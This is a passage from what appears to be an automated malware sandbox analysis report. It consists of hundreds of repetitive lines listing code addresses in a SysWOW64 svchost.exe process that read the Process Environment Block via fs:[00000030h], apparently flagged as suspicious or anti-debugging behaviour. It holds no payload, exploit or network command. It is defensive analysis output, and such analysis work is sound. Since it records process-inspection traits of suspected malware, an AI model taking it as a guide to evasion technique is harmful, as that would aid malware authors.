          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034AE1D0 mov eax, dword ptr fs:[00000030h]3_2_034AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034AE1D0 mov eax, dword ptr fs:[00000030h]3_2_034AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034AE1D0 mov ecx, dword ptr fs:[00000030h]3_2_034AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034AE1D0 mov eax, dword ptr fs:[00000030h]3_2_034AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034AE1D0 mov eax, dword ptr fs:[00000030h]3_2_034AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_035061E5 mov eax, dword ptr fs:[00000030h]3_2_035061E5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034601F8 mov eax, dword ptr fs:[00000030h]3_2_034601F8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03470185 mov eax, dword ptr fs:[00000030h]3_2_03470185
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034EC188 mov eax, dword ptr fs:[00000030h]3_2_034EC188
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034EC188 mov eax, dword ptr fs:[00000030h]3_2_034EC188
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034D4180 mov eax, dword ptr fs:[00000030h]3_2_034D4180
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034D4180 mov eax, dword ptr fs:[00000030h]3_2_034D4180
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B019F mov eax, dword ptr fs:[00000030h]3_2_034B019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B019F mov eax, dword ptr fs:[00000030h]3_2_034B019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B019F mov eax, dword ptr fs:[00000030h]3_2_034B019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B019F mov eax, dword ptr fs:[00000030h]3_2_034B019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0342A197 mov eax, dword ptr fs:[00000030h]3_2_0342A197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0342A197 mov eax, dword ptr fs:[00000030h]3_2_0342A197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0342A197 mov eax, dword ptr fs:[00000030h]3_2_0342A197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03432050 mov eax, dword ptr fs:[00000030h]3_2_03432050
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B6050 mov eax, dword ptr fs:[00000030h]3_2_034B6050
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0345C073 mov eax, dword ptr fs:[00000030h]3_2_0345C073
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B4000 mov ecx, dword ptr fs:[00000030h]3_2_034B4000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034D2000 mov eax, dword ptr fs:[00000030h]3_2_034D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034D2000 mov eax, dword ptr fs:[00000030h]3_2_034D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034D2000 mov eax, dword ptr fs:[00000030h]3_2_034D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034D2000 mov eax, dword ptr fs:[00000030h]3_2_034D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034D2000 mov eax, dword ptr fs:[00000030h]3_2_034D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034D2000 mov eax, dword ptr fs:[00000030h]3_2_034D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034D2000 mov eax, dword ptr fs:[00000030h]3_2_034D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034D2000 mov eax, dword ptr fs:[00000030h]3_2_034D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0344E016 mov eax, dword ptr fs:[00000030h]3_2_0344E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0344E016 mov eax, dword ptr fs:[00000030h]3_2_0344E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0344E016 mov eax, dword ptr fs:[00000030h]3_2_0344E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0344E016 mov eax, dword ptr fs:[00000030h]3_2_0344E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0342A020 mov eax, dword ptr fs:[00000030h]3_2_0342A020
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0342C020 mov eax, dword ptr fs:[00000030h]3_2_0342C020
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034C6030 mov eax, dword ptr fs:[00000030h]3_2_034C6030
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B20DE mov eax, dword ptr fs:[00000030h]3_2_034B20DE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0342A0E3 mov ecx, dword ptr fs:[00000030h]3_2_0342A0E3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034380E9 mov eax, dword ptr fs:[00000030h]3_2_034380E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B60E0 mov eax, dword ptr fs:[00000030h]3_2_034B60E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0342C0F0 mov eax, dword ptr fs:[00000030h]3_2_0342C0F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034720F0 mov ecx, dword ptr fs:[00000030h]3_2_034720F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0343208A mov eax, dword ptr fs:[00000030h]3_2_0343208A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034280A0 mov eax, dword ptr fs:[00000030h]3_2_034280A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034C80A8 mov eax, dword ptr fs:[00000030h]3_2_034C80A8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034F60B8 mov eax, dword ptr fs:[00000030h]3_2_034F60B8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034F60B8 mov ecx, dword ptr fs:[00000030h]3_2_034F60B8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346674D mov esi, dword ptr fs:[00000030h]3_2_0346674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346674D mov eax, dword ptr fs:[00000030h]3_2_0346674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346674D mov eax, dword ptr fs:[00000030h]3_2_0346674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03430750 mov eax, dword ptr fs:[00000030h]3_2_03430750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034BE75D mov eax, dword ptr fs:[00000030h]3_2_034BE75D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03472750 mov eax, dword ptr fs:[00000030h]3_2_03472750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03472750 mov eax, dword ptr fs:[00000030h]3_2_03472750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B4755 mov eax, dword ptr fs:[00000030h]3_2_034B4755
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03438770 mov eax, dword ptr fs:[00000030h]3_2_03438770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03440770 mov eax, dword ptr fs:[00000030h]3_2_03440770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03440770 mov eax, dword ptr fs:[00000030h]3_2_03440770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03440770 mov eax, dword ptr fs:[00000030h]3_2_03440770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03440770 mov eax, dword ptr fs:[00000030h]3_2_03440770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03440770 mov eax, dword ptr fs:[00000030h]3_2_03440770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03440770 mov eax, dword ptr fs:[00000030h]3_2_03440770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03440770 mov eax, dword ptr fs:[00000030h]3_2_03440770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03440770 mov eax, dword ptr fs:[00000030h]3_2_03440770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03440770 mov eax, dword ptr fs:[00000030h]3_2_03440770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03440770 mov eax, dword ptr fs:[00000030h]3_2_03440770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03440770 mov eax, dword ptr fs:[00000030h]3_2_03440770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03440770 mov eax, dword ptr fs:[00000030h]3_2_03440770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346C700 mov eax, dword ptr fs:[00000030h]3_2_0346C700
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03430710 mov eax, dword ptr fs:[00000030h]3_2_03430710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03460710 mov eax, dword ptr fs:[00000030h]3_2_03460710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346C720 mov eax, dword ptr fs:[00000030h]3_2_0346C720
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346C720 mov eax, dword ptr fs:[00000030h]3_2_0346C720
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346273C mov eax, dword ptr fs:[00000030h]3_2_0346273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346273C mov ecx, dword ptr fs:[00000030h]3_2_0346273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346273C mov eax, dword ptr fs:[00000030h]3_2_0346273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034AC730 mov eax, dword ptr fs:[00000030h]3_2_034AC730
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0343C7C0 mov eax, dword ptr fs:[00000030h]3_2_0343C7C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B07C3 mov eax, dword ptr fs:[00000030h]3_2_034B07C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034527ED mov eax, dword ptr fs:[00000030h]3_2_034527ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034527ED mov eax, dword ptr fs:[00000030h]3_2_034527ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034527ED mov eax, dword ptr fs:[00000030h]3_2_034527ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034BE7E1 mov eax, dword ptr fs:[00000030h]3_2_034BE7E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034347FB mov eax, dword ptr fs:[00000030h]3_2_034347FB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034347FB mov eax, dword ptr fs:[00000030h]3_2_034347FB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034D678E mov eax, dword ptr fs:[00000030h]3_2_034D678E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034307AF mov eax, dword ptr fs:[00000030h]3_2_034307AF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034E47A0 mov eax, dword ptr fs:[00000030h]3_2_034E47A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0344C640 mov eax, dword ptr fs:[00000030h]3_2_0344C640
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034F866E mov eax, dword ptr fs:[00000030h]3_2_034F866E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034F866E mov eax, dword ptr fs:[00000030h]3_2_034F866E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346A660 mov eax, dword ptr fs:[00000030h]3_2_0346A660
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346A660 mov eax, dword ptr fs:[00000030h]3_2_0346A660
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03462674 mov eax, dword ptr fs:[00000030h]3_2_03462674
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034AE609 mov eax, dword ptr fs:[00000030h]3_2_034AE609
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0344260B mov eax, dword ptr fs:[00000030h]3_2_0344260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0344260B mov eax, dword ptr fs:[00000030h]3_2_0344260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0344260B mov eax, dword ptr fs:[00000030h]3_2_0344260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0344260B mov eax, dword ptr fs:[00000030h]3_2_0344260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0344260B mov eax, dword ptr fs:[00000030h]3_2_0344260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0344260B mov eax, dword ptr fs:[00000030h]3_2_0344260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0344260B mov eax, dword ptr fs:[00000030h]3_2_0344260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03472619 mov eax, dword ptr fs:[00000030h]3_2_03472619
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0344E627 mov eax, dword ptr fs:[00000030h]3_2_0344E627
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03466620 mov eax, dword ptr fs:[00000030h]3_2_03466620
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03468620 mov eax, dword ptr fs:[00000030h]3_2_03468620
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0343262C mov eax, dword ptr fs:[00000030h]3_2_0343262C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346A6C7 mov ebx, dword ptr fs:[00000030h]3_2_0346A6C7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346A6C7 mov eax, dword ptr fs:[00000030h]3_2_0346A6C7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034AE6F2 mov eax, dword ptr fs:[00000030h]3_2_034AE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034AE6F2 mov eax, dword ptr fs:[00000030h]3_2_034AE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034AE6F2 mov eax, dword ptr fs:[00000030h]3_2_034AE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034AE6F2 mov eax, dword ptr fs:[00000030h]3_2_034AE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B06F1 mov eax, dword ptr fs:[00000030h]3_2_034B06F1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B06F1 mov eax, dword ptr fs:[00000030h]3_2_034B06F1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03434690 mov eax, dword ptr fs:[00000030h]3_2_03434690
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03434690 mov eax, dword ptr fs:[00000030h]3_2_03434690
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346C6A6 mov eax, dword ptr fs:[00000030h]3_2_0346C6A6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034666B0 mov eax, dword ptr fs:[00000030h]3_2_034666B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03438550 mov eax, dword ptr fs:[00000030h]3_2_03438550
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03438550 mov eax, dword ptr fs:[00000030h]3_2_03438550
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346656A mov eax, dword ptr fs:[00000030h]3_2_0346656A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346656A mov eax, dword ptr fs:[00000030h]3_2_0346656A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346656A mov eax, dword ptr fs:[00000030h]3_2_0346656A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034C6500 mov eax, dword ptr fs:[00000030h]3_2_034C6500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03504500 mov eax, dword ptr fs:[00000030h]3_2_03504500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03504500 mov eax, dword ptr fs:[00000030h]3_2_03504500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03504500 mov eax, dword ptr fs:[00000030h]3_2_03504500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03504500 mov eax, dword ptr fs:[00000030h]3_2_03504500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03504500 mov eax, dword ptr fs:[00000030h]3_2_03504500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03504500 mov eax, dword ptr fs:[00000030h]3_2_03504500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03504500 mov eax, dword ptr fs:[00000030h]3_2_03504500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03440535 mov eax, dword ptr fs:[00000030h]3_2_03440535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03440535 mov eax, dword ptr fs:[00000030h]3_2_03440535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03440535 mov eax, dword ptr fs:[00000030h]3_2_03440535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03440535 mov eax, dword ptr fs:[00000030h]3_2_03440535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03440535 mov eax, dword ptr fs:[00000030h]3_2_03440535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03440535 mov eax, dword ptr fs:[00000030h]3_2_03440535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0345E53E mov eax, dword ptr fs:[00000030h]3_2_0345E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0345E53E mov eax, dword ptr fs:[00000030h]3_2_0345E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0345E53E mov eax, dword ptr fs:[00000030h]3_2_0345E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0345E53E mov eax, dword ptr fs:[00000030h]3_2_0345E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0345E53E mov eax, dword ptr fs:[00000030h]3_2_0345E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346E5CF mov eax, dword ptr fs:[00000030h]3_2_0346E5CF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346E5CF mov eax, dword ptr fs:[00000030h]3_2_0346E5CF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034365D0 mov eax, dword ptr fs:[00000030h]3_2_034365D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346A5D0 mov eax, dword ptr fs:[00000030h]3_2_0346A5D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346A5D0 mov eax, dword ptr fs:[00000030h]3_2_0346A5D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0345E5E7 mov eax, dword ptr fs:[00000030h]3_2_0345E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0345E5E7 mov eax, dword ptr fs:[00000030h]3_2_0345E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0345E5E7 mov eax, dword ptr fs:[00000030h]3_2_0345E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0345E5E7 mov eax, dword ptr fs:[00000030h]3_2_0345E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0345E5E7 mov eax, dword ptr fs:[00000030h]3_2_0345E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0345E5E7 mov eax, dword ptr fs:[00000030h]3_2_0345E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0345E5E7 mov eax, dword ptr fs:[00000030h]3_2_0345E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0345E5E7 mov eax, dword ptr fs:[00000030h]3_2_0345E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034325E0 mov eax, dword ptr fs:[00000030h]3_2_034325E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346C5ED mov eax, dword ptr fs:[00000030h]3_2_0346C5ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346C5ED mov eax, dword ptr fs:[00000030h]3_2_0346C5ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03432582 mov eax, dword ptr fs:[00000030h]3_2_03432582
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03432582 mov ecx, dword ptr fs:[00000030h]3_2_03432582
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03464588 mov eax, dword ptr fs:[00000030h]3_2_03464588
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346E59C mov eax, dword ptr fs:[00000030h]3_2_0346E59C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B05A7 mov eax, dword ptr fs:[00000030h]3_2_034B05A7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B05A7 mov eax, dword ptr fs:[00000030h]3_2_034B05A7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B05A7 mov eax, dword ptr fs:[00000030h]3_2_034B05A7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034545B1 mov eax, dword ptr fs:[00000030h]3_2_034545B1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034545B1 mov eax, dword ptr fs:[00000030h]3_2_034545B1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346E443 mov eax, dword ptr fs:[00000030h]3_2_0346E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346E443 mov eax, dword ptr fs:[00000030h]3_2_0346E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346E443 mov eax, dword ptr fs:[00000030h]3_2_0346E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346E443 mov eax, dword ptr fs:[00000030h]3_2_0346E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346E443 mov eax, dword ptr fs:[00000030h]3_2_0346E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346E443 mov eax, dword ptr fs:[00000030h]3_2_0346E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346E443 mov eax, dword ptr fs:[00000030h]3_2_0346E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346E443 mov eax, dword ptr fs:[00000030h]3_2_0346E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034EA456 mov eax, dword ptr fs:[00000030h]3_2_034EA456
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0342645D mov eax, dword ptr fs:[00000030h]3_2_0342645D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0345245A mov eax, dword ptr fs:[00000030h]3_2_0345245A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034BC460 mov ecx, dword ptr fs:[00000030h]3_2_034BC460
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0345A470 mov eax, dword ptr fs:[00000030h]3_2_0345A470
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0345A470 mov eax, dword ptr fs:[00000030h]3_2_0345A470
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0345A470 mov eax, dword ptr fs:[00000030h]3_2_0345A470
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03468402 mov eax, dword ptr fs:[00000030h]3_2_03468402
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03468402 mov eax, dword ptr fs:[00000030h]3_2_03468402
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03468402 mov eax, dword ptr fs:[00000030h]3_2_03468402
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0342E420 mov eax, dword ptr fs:[00000030h]3_2_0342E420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0342E420 mov eax, dword ptr fs:[00000030h]3_2_0342E420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0342E420 mov eax, dword ptr fs:[00000030h]3_2_0342E420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0342C427 mov eax, dword ptr fs:[00000030h]3_2_0342C427
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B6420 mov eax, dword ptr fs:[00000030h]3_2_034B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B6420 mov eax, dword ptr fs:[00000030h]3_2_034B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B6420 mov eax, dword ptr fs:[00000030h]3_2_034B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B6420 mov eax, dword ptr fs:[00000030h]3_2_034B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B6420 mov eax, dword ptr fs:[00000030h]3_2_034B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B6420 mov eax, dword ptr fs:[00000030h]3_2_034B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B6420 mov eax, dword ptr fs:[00000030h]3_2_034B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346A430 mov eax, dword ptr fs:[00000030h]3_2_0346A430
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034304E5 mov ecx, dword ptr fs:[00000030h]3_2_034304E5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034EA49A mov eax, dword ptr fs:[00000030h]3_2_034EA49A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034364AB mov eax, dword ptr fs:[00000030h]3_2_034364AB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034644B0 mov ecx, dword ptr fs:[00000030h]3_2_034644B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034BA4B0 mov eax, dword ptr fs:[00000030h]3_2_034BA4B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034E4B4B mov eax, dword ptr fs:[00000030h]3_2_034E4B4B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034E4B4B mov eax, dword ptr fs:[00000030h]3_2_034E4B4B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03502B57 mov eax, dword ptr fs:[00000030h]3_2_03502B57
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03502B57 mov eax, dword ptr fs:[00000030h]3_2_03502B57
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03502B57 mov eax, dword ptr fs:[00000030h]3_2_03502B57
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03502B57 mov eax, dword ptr fs:[00000030h]3_2_03502B57
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034C6B40 mov eax, dword ptr fs:[00000030h]3_2_034C6B40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034C6B40 mov eax, dword ptr fs:[00000030h]3_2_034C6B40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034FAB40 mov eax, dword ptr fs:[00000030h]3_2_034FAB40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034D8B42 mov eax, dword ptr fs:[00000030h]3_2_034D8B42
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03428B50 mov eax, dword ptr fs:[00000030h]3_2_03428B50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034DEB50 mov eax, dword ptr fs:[00000030h]3_2_034DEB50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0342CB7E mov eax, dword ptr fs:[00000030h]3_2_0342CB7E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03504B00 mov eax, dword ptr fs:[00000030h]3_2_03504B00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034AEB1D mov eax, dword ptr fs:[00000030h]3_2_034AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034AEB1D mov eax, dword ptr fs:[00000030h]3_2_034AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034AEB1D mov eax, dword ptr fs:[00000030h]3_2_034AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034AEB1D mov eax, dword ptr fs:[00000030h]3_2_034AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034AEB1D mov eax, dword ptr fs:[00000030h]3_2_034AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034AEB1D mov eax, dword ptr fs:[00000030h]3_2_034AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034AEB1D mov eax, dword ptr fs:[00000030h]3_2_034AEB1D
